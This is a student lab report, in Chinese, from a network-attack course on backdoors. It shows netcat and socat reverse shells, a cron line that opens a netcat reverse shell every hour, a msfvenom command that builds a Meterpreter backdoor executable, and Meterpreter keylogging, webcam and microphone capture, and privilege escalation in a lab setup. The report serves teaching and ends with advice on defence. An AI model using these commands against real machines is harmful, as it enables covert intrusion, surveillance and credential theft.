20145215《网络对抗》Exp2 后门原理与实践
20145215《网络对抗》Exp2 后门原理与实践
基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
- 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;
- 浏览网页的时候,点的一些小广告可能会被植入后门。
- 例举你知道的后门如何启动起来(win及linux)的方式?
- Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;
- 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动;
- Linux下可以通过cron来启动。
- Meterpreter有哪些给你映像深刻的功能?
- 直接通过指令获取主机的摄像头有点6,有点像电影里的黑客;
- 获取击键记录也能得到很多信息,比如登录什么网站的密码,或者说和某人的重要聊天记录之类的,都非常容易被人窃取到进行分析;
- 导出密码文件功能简直是有点无解,这样一来你的电脑相当于是透明的;
- 后门进程的迁移,这样即使有管理员去查看运行的进程也很难发现后门的存在;
- 使用后渗透攻击模块POST可以对主机进行更深入的攻击。
- 如何发现自己有系统有没有被安装后门?
- 没有经过免杀处理的后门程序可能很容易就被杀毒工具扫出来,不过一般现在这样的后门也很少了;
- 检查防火墙开启的端口和它对应的进程,如果不是系统默认开启的端口都有嫌疑,找到对应的进程,对其进行抓包分析;
- 下载专门的监控软件,对操作系统中的进程进行监控,看是否存在异常。
常用后门工具实践
Windows获得Linux Shell
在Windows下,先使用
ipconfig指令查看本机IP:
使用
ncat.exe程序监听本机的5215端口:
在Kali环境下,使用
nc指令的-e选项反向连接Windows主机的5215端口:
Windows下成功获得了一个Kali的shell,运行
ls指令如下:
Linux获得Windows Shell
过程与之前的类似,在Kali环境下用
ifconfig查看IP:
使用
nc指令监听5215端口:
在Windows下,使用
ncat.exe程序的-e选项项反向连接Kali主机的5215端口:
Kali下可以看到Windows的命令提示,可以输入Windows命令:
使用nc传输数据
Windows下监听
5215端口:
Kali下连接到Windows的
5215端口:
建立连接之后,就可以传输数据了,这里传输的是字符串,相当于两台主机在聊天,也可以用重定向操作符来传输文件:
实验内容
使用netcat获取主机操作Shell,cron启动
先在Windows系统下,监听
5215端口:
在Kali环境下,使用
man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。
用
crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
在最后一行添加
37 * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh,意思是在每个小时的第37分钟反向连接Windows主机的5215端口,设置成37的原因是我当时的时间是19点36,为了能立马看到效果,所以我将时间设置在了一分钟以后:
当时间到了19点37时,此时已经获得了Kali的shell,可以输入指令(如果在这之前输入指令,屏幕上不会有显示,但是等到了37分时会立马显示出来):
使用socat获取主机操作Shell, 任务计划启动
基础知识
socat是ncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个address是必选项,而options是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
实践过程
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的
socat.exe文件的路径,在添加参数一栏填写tcp-listen:5215 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5215,同时把cmd.exe的stderr重定向到stdout上:
创建完成之后,按
Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:
此时,在Kali环境下输入指令
socat - tcp:192.168.1.200:5215,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5215端口,此时可以发现已经成功获得了一个cmd shell:
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20145215_backdoor.exe生成后门程序:
通过
nc指令将生成的后门程序传送到Windows主机上:
在Kali上使用
msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
设置完成后,执行监听:
打开Windows上的后门程序:
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用
record_mic指令可以截获一段音频:
使用
webcam_snap指令可以使用摄像头进行拍照:
使用
webcam stream指令可以使用摄像头进行录像:
使用
screenshot指令可以进行截屏:
使用
keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
先使用
getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功(为啥win7这么脆弱???):
实验总结与体会
- 实验过程中最大的触动还是在使用MSF的时候,非常轻易的就从Windows上获取到了许多信息,在实验成功的同时也越来越让我感觉到现在的电脑真的是不堪一击,当然很多时候还是由于我们缺乏一定的安全意识所导致的。比如说没有养成定时打补丁的习惯,又或者是在下载软件的时候没有去通过正规渠道,这些东西在平常看起来没有什么大问题,如果有一天你的电脑有了利用价值,那么黑客想要攻击你的电脑就会变得易如反掌。
- 提高电脑的安全性还是要从我们平常做起,比如说可以经常关闭一些本机不用的端口或只允许指定的端口访问,其次要使用专杀木马的软件,为了有效地防范木马后门,还要学会对进程进行操作,时时注意系统运行状况,看看是否有一些不明进程正运行并及时地将不明进程终止掉。
最新文章
- 在JavaScript 自定义对象来模拟Java中的Map
- Inf2Cat, signability test failed.
- Python中lstrip使用心得
- [RxJS] Utility operator: do
- STL之Errors and Exceptions
- js问题学习
- DEBUG模式下, 内存中的变量地址分析
- SpringMVC源代码深度分析DispatcherServlet核心的控制器(初始化)
- Spring MVC - 表单处理示例
- Java1.0-1.12各个版本的新特性
- Flink Event Time Processing and Watermarks(文末有翻译)
- Executors的四种线程池
- Delphi调用API函数获取Windows目录信息、获取System目录信息、获取Temp临时文件目录信息
- Object类(根类)
- Python框架学习之Flask中的视图及路由
- Spring 在 xml配置文件 或 annotation 注解中 运用Spring EL表达式
- VUE + ElementUI 从搭建到运行
- 2018年浙江理工大学程序设计竞赛校赛 Problem I: 沙僧
- ElasticSearch 6.x 父子文档[join]分析
- Codeforces852G(字符串hash)
热门文章
- EZ 2017 12 17初二初三第一次膜你赛
- MFC如何为程序添加标题
- JS计算混合字符串长度
- idea git pull项目到本地时容易出现的问题
- 利用privoxy劫持http网站数据,插入广告,获取用户名,密码
- 警告: [SetPropertiesRule]{Server/Service/Engine/Host/Context}Setting property 'source' to 'org.eclipse
- photoshop cs6安装过程中安装程序遇到错误:请重启计算机,解决办法
- 使用pyspark模仿sqoop从oracle导数据到hive的主要功能(自动建表,分区导入,增量,解决数据换行符问题)
- PAT甲题题解-1054. The Dominant Color (20)-排序/map
- js实现随机的四则运算题目